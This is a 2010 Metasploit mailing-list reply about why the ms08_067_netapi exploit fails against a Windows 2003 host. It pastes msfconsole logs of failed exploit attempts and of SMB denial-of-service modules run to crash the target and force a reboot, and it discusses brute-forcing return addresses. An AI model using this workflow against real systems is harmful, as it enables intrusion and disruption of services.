Metasploit mailing list archives
Re: Unreliable exploitation with ms08_067_netapi ?
From: Richard Miles <richard.k.miles () googlemail com>
Date: Thu, 3 Jun 2010 21:30:46 +0000
Again, very informative. Thanks.
http://www.immunitysec.com/downloads/MacroReliability.odp Slide 21 (and 19 for the share name, but printers turned out to work better)
Very interesting document. This product from immunity appear to be nice, if it does all it claims...
Restarting doesn't work because the services end up in different processes. You can, however set SMBPIPE to "SRVSVC", but this might require authentication if simple file sharing is not enabled on a newer version of Windows.
Nice to now, more one shot. Router is not a option for this vuln?
You can set SMBUser/SMBPass in the exploit and it should be able to fingerprint the language properly.
I get surprised it do not appear when I call show options. My first try was strange. msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0) [*] Exploit completed, but no session was created. My credential is a network credential of a restricted user, so I did guessed a parameter name... msf exploit(ms08_067_netapi) > set SMBDomain mydomainname.tld And I was all curious to see the magic. msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown [-] Could not determine the exact language pack [*] Auto-targeting failed, use 'show targets' to manually select one [*] Exploit completed, but no session was created. The result was exactly the same as without credential. I'm missing something? I also used SRVSVC and target 9 (NX) as suggested. msf exploit(ms08_067_netapi) > set target 9 target => 9 msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Attempting to trigger the vulnerability... [-] Exploit failed: Connection reset by peer [*] Exploit completed, but no session was created. Exactly the same.
I also was thinking, this exploit do not restart the machine if the exploitation fail, if the box is vulnerable it's very probable the target also will be SMBv2 DoS, which could help us to force a reboot to give another try. There is such a exploit at Metasploit?There are a number of SMB DoS bugs under auxiliary/dos/windows/smb/, including some for SMBv2 flaws.
Based on a target vuln to ms08-067 do you suggest me some in special? I tried without success. msf auxiliary(ms09_001_write) > exploit Attempting to crash the remote host... datalenlow=65535 dataoffset=65535 fillersize=72 rescue datalenlow=55535 dataoffset=65535 fillersize=72 rescue datalenlow=45535 dataoffset=65535 fillersize=72 rescue datalenlow=35535 dataoffset=65535 fillersize=72 rescue Nothing happened. msf auxiliary(rras_vls_null_deref) > exploit [*] Binding to 8f09f000-b7ed-11ce-bbd2-00001a181cad:0.0@ncacn_np:10.1.1.1[\ROUTER] ... [-] Auxiliary failed: RuntimeError Could not bind to 8f09f000-b7ed-11ce-bbd2-00001a181cad:0.0@ncacn_np:10.1.1.1[\ROUTER] [-] Call stack: [-] /test/trunk/lib/rex/proto/dcerpc/client.rb:266:in `bind' [-] /test/trunk/lib/rex/proto/dcerpc/client.rb:47:in `initialize' [-] /test/trunk/lib/msf/core/exploit/dcerpc.rb:124:in `new' [-] /test/trunk/lib/msf/core/exploit/dcerpc.rb:124:in `dcerpc_bind' [-] (eval):66:in `run' [*] Auxiliary module execution completed msf auxiliary(rras_vls_null_deref) > set SMBPIPE SRVSVC SMBPIPE => SRVSVC msf auxiliary(ms06_063_trans) > exploit [*] Connecting to the target system... [*] Sending bad SMB transaction request 1... [*] Sending bad SMB transaction request 2... [*] Sending bad SMB transaction request 3... [*] Sending bad SMB transaction request 4... [*] Sending bad SMB transaction request 5... [*] Auxiliary module execution completed nothing happen. msf auxiliary(ms09_050_smb2_session_logoff) > exploit [*] Targeting host 10.1.1.1:445... [*] Sending the exploit packet (192 bytes)... [*] Response received. The target system is not vulnerable: "\000\000\000#\377SMBr\002\000\001\000\230S\210\002\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000" [*] Auxiliary module execution completed Failed. msf auxiliary(rras_vls_null_deref) > exploit Most of the others the connection is reseted by per, probable because the previous failed exploitation at ms08_067? msf auxiliary(ms09_050_smb2_session_logoff) > exploit [*] Targeting host 10.1.1.1:445... [*] Sending the exploit packet (192 bytes)... [-] Auxiliary failed: Errno::ECONNRESET Connection reset by peer [-] Call stack: [-] /test/trunk/lib/rex/io/stream.rb:44:in `syswrite' [-] /test/trunk/lib/rex/io/stream.rb:44:in `write' [-] /test/trunk/lib/rex/io/stream.rb:140:in `timed_write' [-] /test/trunk/lib/rex/io/stream.rb:171:in `put' [-] (eval):63:in `run' [*] Auxiliary module execution completed [*] Binding to 8f09f000-b7ed-11ce-bbd2-00001a181cad:0.0@ncacn_np:10.1.1.1[\SRVSVC] ... [-] Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0) [-] Call stack: [-] /test/trunk/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse' [-] /test/trunk/lib/rex/proto/smb/client.rb:1011:in `create' [-] /test/trunk/lib/rex/proto/smb/client.rb:985:in `create_pipe' [-] /test/trunk/lib/rex/proto/smb/simpleclient.rb:280:in `create_pipe' [-] /test/trunk/lib/rex/proto/dcerpc/client.rb:128:in `smb_connect' [-] /test/trunk/lib/rex/proto/dcerpc/client.rb:65:in `socket_check' [-] /test/trunk/lib/rex/proto/dcerpc/client.rb:40:in `initialize' [-] /test/trunk/lib/msf/core/exploit/dcerpc.rb:124:in `new' [-] /test/trunk/lib/msf/core/exploit/dcerpc.rb:124:in `dcerpc_bind' [-] (eval):66:in `run'
It would be odd to have an AV product new enough to catch this as but installed on a system unpatched against a vuln from 2008.
I was reading the post again more carefully and it told that what catch was a overflow protection of the AV. I will consider buy a mcafee av. 2008...long time. ms08_067 is the last exploit (for the last vuln) that affect most windows attacking directly, not? I mean, without talk about client-sides, or other services, just talking about native services from Microsoft installed by default like file sharing, RPC, etc. Or there is a better one to test?
I tried at one point and couldn't find any working combinations of opcodes. This is kind of pointless in the real world, as you would need to know exactly the right patch level to choose the correct target.
Too bad. What about the major versions without any patch? Like Windows Server 2003 R1 + combination with service packs Windows Server 2003 R2 + combination with service packs etc Looks a good idea?
Humm... for this kind of exploit is impossible to brute force this address values, like in old overflows where ret brute force was possible? I mean, if used together with a SMBv2 DOS exploit it could work, not? Or exploitation is too different on recent days?Too different. The SP2 targets use 5 different hardcoded addresses; you can try building targets for as many combinations as possible, then cycling the targets, but each target will take a few hours to get right.
First I have to make a smb DOS exploit work after a failed exploitation on ms08_067, then I will move to this idea. 5 different hardcoded address appear a lot of stuff for a few hours. I believe you are thinking in some optimization, like a minimum and maximum address for this addresses, not? Thanks again. Rick _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Unreliable exploitation with ms08_067_netapi ? Richard Miles (Jun 03)
- Re: Unreliable exploitation with ms08_067_netapi ? HD Moore (Jun 03)
- Re: Unreliable exploitation with ms08_067_netapi ? Richard Miles (Jun 03)
- Re: Unreliable exploitation with ms08_067_netapi ? HD Moore (Jun 03)
- Re: Unreliable exploitation with ms08_067_netapi ? Richard Miles (Jun 03)
- Re: Unreliable exploitation with ms08_067_netapi ? Richard Miles (Jun 03)
- Re: Unreliable exploitation with ms08_067_netapi ? HD Moore (Jun 03)